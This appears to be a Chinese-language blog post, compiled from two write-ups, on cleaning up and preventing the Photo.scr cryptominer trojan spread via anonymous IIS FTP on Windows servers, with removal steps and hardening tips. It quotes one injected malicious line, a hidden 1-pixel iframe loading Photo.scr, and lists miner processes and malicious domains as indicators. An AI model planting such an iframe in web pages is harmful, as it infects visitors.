Photo.scr病毒怎么清除和防范？

有段時間筆者的win2003服務器上出現大量Photo.scr病毒，慶幸的是檢查任務管理器后并沒有發現可疑進程，說明病毒沒有被執行。

刪除后沒清靜多少時間，這些病毒又冒出來了。

這些Photo.scr的路徑都在IIS自帶FTP的路徑下，關閉FTP服務就不再出現了，只要一開FTP過段時間又會出現。

然后就認為黑客是利用了IIS自帶的FTP漏洞上傳的病毒文件，只要不用FTP時就關掉FTP服務。

剛剛發現原來是開了FTP的匿名連接導致的，只要取消“允許匿名連接”的勾就解決了。

這段時間筆者在給網站搬家時，發現Defender對網站文件進行報毒，查看后是被加入了以下惡意代碼，以達到病毒傳播的目的。
<iframe src=Photo.scr width=1 height=1 frameborder=0></iframe>

黑客并沒有批量添加代碼，只改了2個文件，而且不僅限是html文件，還有xml文件也沒幸免，應該是黑客覺得批量添加容易被發現，所以手動添加。

清除Photo.scr病毒：
1、如果沒有運行它，直接搜索Photo.scr并刪除就可以了，如果已經運行過，建議殺毒或重裝系統。
2、檢查下文件有沒有被添加惡意代碼，雖然已經刪除Photo.scr不會再傳播，但是安全軟件還是會報毒提示，如果被添加惡意代碼刪除即可。

安全防范建議：
1、雖然知道了是開了FTP的匿名連接導致病毒上傳，不過還是建議不用FTP的時候還是關閉它，誰知道它還會有其它的什么漏洞呢。
2、建議FTP的目錄不要直接設在網站目錄，如需上傳文件到網站目錄，可以先上傳到別處再通過復制或剪切到網站目錄。
3、更改FTP默認端口，避免被黑客的端口掃描器掃到。

=======================================================================

當服務器上出現這些文件：photo.scr時，說明你的服務器已經感染了礦機木馬。

　　第一次發現這個木馬的時候是在上班, 突然發現公司的云服務器上有這個可疑的文件, 它是這樣的圖標(右邊是正常的文件夾):

　　

?

　　只是一個簡單的礦機木馬, 技術含量不高, 中了招的朋友可以通過以下步驟刪除木馬:

　　打開任務管理器, 結束 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 這三個進程. 64的那個不一定有.

　　刪除所有磁盤根目錄下的 photo.scr 文件.

　　刪除 %Temp% 文件夾下的 pools.txt | NsCPUCNMiner32.exe | NsCPUCNMiner64.exe 這三個文件, 64的那個不一定有.

　　(此項步驟可選, 用于防止再次中招) 將 stafftest.ru | www.stafftest.ru | u.lduxnfz.com 這三個地址用hosts屏蔽為127.0.0.1

　　(此項步驟可選, 用于防止再次中招) 將 NsCPUCNMiner32.exe | NsCPUCNMiner64.exe | photo.scr 這三個進程用iHtool工具加入IFEO映像劫持.

?

　　(此項步驟可選, 用于防止再次中招) 如果你的電腦正在運行 ftp server, 設置一個密碼或者用ssl加密(更改端口也可).

最后要說下的是win系統自帶的FTP能不安裝就別安裝它，數據上傳方式有很多種方法，比如上傳到網盤里在服務器上下載，或者安裝一個其他的FTP軟件。

總結

以上是生活随笔為你收集整理的Photo.scr病毒的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。